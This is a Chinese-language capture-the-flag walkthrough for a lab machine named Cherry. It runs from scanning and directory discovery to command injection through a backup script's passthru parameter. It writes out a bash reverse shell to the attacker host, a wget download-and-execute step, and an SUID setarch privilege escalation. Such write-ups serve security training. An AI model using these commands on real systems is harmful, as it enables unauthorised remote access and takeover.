Cherry(樱桃)
难点:靶机植入文件
1.信息收集
nmap 扫描
nmap -sS 192.168.221.0/24 -T4 半开扫描,找到靶机
nmap -sV -p- 192.168.221.133 -T4 全端口扫描,扫描出未发现的端口
利用80端口收集网页信息
未发现可用信息
查看7755端口
同样未发现有用信息
2.目录扫描
/usr/share/wordlists/dirbuster
gobuster dir -w directory-list-2.3-medium.txt -x html -u http://192.168.221.133:7755/
查看http://192.168.221.133:7755/backup/
查看每个目录
http://192.168.221.133:7755/backup/command.php
发现passthru函数
3.文件植入
我们可以试试反弹shell
在/tmp/下创建一个以.sh结尾的文件
#!/bin/bash
bash -i >& /dev/tcp/192.168.221.134/8888 0>&1
开启80端口
python3 -m http.server 80
在靶机植入文件
http://192.168.221.133:7755/backup/command.php?backup= wget-O/tmp/shell.sh http://192.168.221.134/tmp/shell.sh
查看
下载成功
kali监听
nc -lvp 8888
运行
http://192.168.221.133:7755/backup/command.php?backup=bash /tmp/shell.sh
kali反弹成功
4.SUID提权
查找可提权命令
find / -perm -u=s -type f 2>/dev/null
发现setarch可以提权
setarch $(arch) /bin/sh -p 提权方式